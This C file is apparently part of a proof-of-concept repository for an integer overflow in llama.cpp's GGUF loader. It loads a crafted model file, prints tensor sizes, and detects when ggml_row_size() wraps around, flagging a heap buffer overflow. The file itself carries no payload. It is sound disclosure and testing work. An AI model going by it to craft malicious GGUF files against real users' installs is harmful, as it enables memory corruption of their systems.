llama-cpp-tensor-overflow-poc / test_tensor_overflow.c

Upload test_tensor_overflow.c with huggingface_hub

fb05c3a verified about 1 month ago

4.46 kB

	/*
	* Test program to demonstrate integer overflow in tensor size calculation.
	* Loads a malicious GGUF file and shows that ggml_nbytes() returns
	* an incorrect (too small) value due to integer overflow in ggml_row_size().
	*
	* Compile:
	* cc -o test_tensor_overflow test_tensor_overflow.c \
	* -I ../llama.cpp/ggml/include -I ../llama.cpp/ggml/src \
	* -L ../llama.cpp/build/bin -lggml-base -lggml \
	* -Wl,-rpath,../llama.cpp/build/bin
	*
	* Run:
	* ./test_tensor_overflow poc_tensor_overflow.gguf
	*/

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#include <inttypes.h>
	#include "ggml.h"
	#include "gguf.h"

	int main(int argc, char **argv) {
	if (argc < 2) {
	fprintf(stderr, "Usage: %s <gguf_file>\n", argv[0]);
	return 1;
	}

	const char *fname = argv[1];
	printf("=== Tensor Integer Overflow PoC ===\n");
	printf("Loading: %s\n\n", fname);

	struct ggml_context *ctx = NULL;
	struct gguf_init_params params = {
	.no_alloc = true,
	.ctx = &ctx,
	};

	struct gguf_context *gctx = gguf_init_from_file(fname, params);
	if (!gctx) {
	fprintf(stderr, "ERROR: gguf_init_from_file failed!\n");
	return 1;
	}

	printf("[+] GGUF file loaded successfully (all validation passed!)\n\n");

	int n_tensors = gguf_get_n_tensors(gctx);
	printf("Number of tensors: %d\n\n", n_tensors);

	// Iterate over tensors and show the overflow
	struct ggml_tensor *tensor = ggml_get_first_tensor(ctx);
	while (tensor) {
	printf("Tensor: '%s'\n", tensor->name);
	printf(" Type: %s (type_size=%zu, blck_size=%" PRId64 ")\n",
	ggml_type_name(tensor->type),
	ggml_type_size(tensor->type),
	ggml_blck_size(tensor->type));
	printf(" Dimensions: ne[0]=%" PRId64 ", ne[1]=%" PRId64
	", ne[2]=%" PRId64 ", ne[3]=%" PRId64 "\n",
	tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
	printf(" Strides: nb[0]=%zu, nb[1]=%zu, nb[2]=%zu, nb[3]=%zu\n",
	tensor->nb[0], tensor->nb[1], tensor->nb[2], tensor->nb[3]);

	size_t nbytes = ggml_nbytes(tensor);
	int64_t nelements = ggml_nelements(tensor);

	// Compute what the correct size should be
	// For Q4_0: correct = type_size * nelements / blck_size = 18 * ne[0] / 32
	size_t type_size = ggml_type_size(tensor->type);
	int64_t blck_size = ggml_blck_size(tensor->type);
	// Use Python-style big number arithmetic to show correct value
	// correct_nbytes = nelements * type_size / blck_size
	// But we can't compute this without overflow in C, so just show the values

	printf(" ggml_nbytes(): %zu bytes\n", nbytes);
	printf(" ggml_nelements(): %" PRId64 "\n", nelements);
	printf(" ggml_row_size(): %zu bytes\n", ggml_row_size(tensor->type, tensor->ne[0]));

	// Show the overflow
	size_t row_size = ggml_row_size(tensor->type, tensor->ne[0]);
	printf("\n === OVERFLOW DETECTION ===\n");
	printf(" ggml_row_size = type_size * ne[0] / blck_size\n");
	printf(" = %zu * %" PRId64 " / %" PRId64 "\n",
	type_size, tensor->ne[0], blck_size);
	printf(" Computed result: %zu bytes\n", row_size);

	// Check for overflow: if type_size * ne[0] / blck_size != row_size
	// then overflow occurred
	// We can detect this by checking: row_size * blck_size / type_size != ne[0]
	if (type_size > 0 && blck_size > 0) {
	int64_t reconstructed = (int64_t)(row_size * blck_size / type_size);
	if (reconstructed != tensor->ne[0]) {
	printf(" * INTEGER OVERFLOW DETECTED! *\n");
	printf(" Reconstructed ne[0] from row_size: %" PRId64 "\n", reconstructed);
	printf(" Actual ne[0]: %" PRId64 "\n", tensor->ne[0]);
	printf(" The buffer would be %zu bytes but tensor claims %" PRId64 " elements!\n",
	nbytes, nelements);
	printf(" This is a HEAP BUFFER OVERFLOW vulnerability!\n");
	} else {
	printf(" No overflow detected for this tensor.\n");
	}
	}

	printf("\n");
	tensor = ggml_get_next_tensor(ctx, tensor);
	}

	ggml_free(ctx);
	gguf_free(gctx);

	printf("[+] Test complete.\n");
	return 0;
	}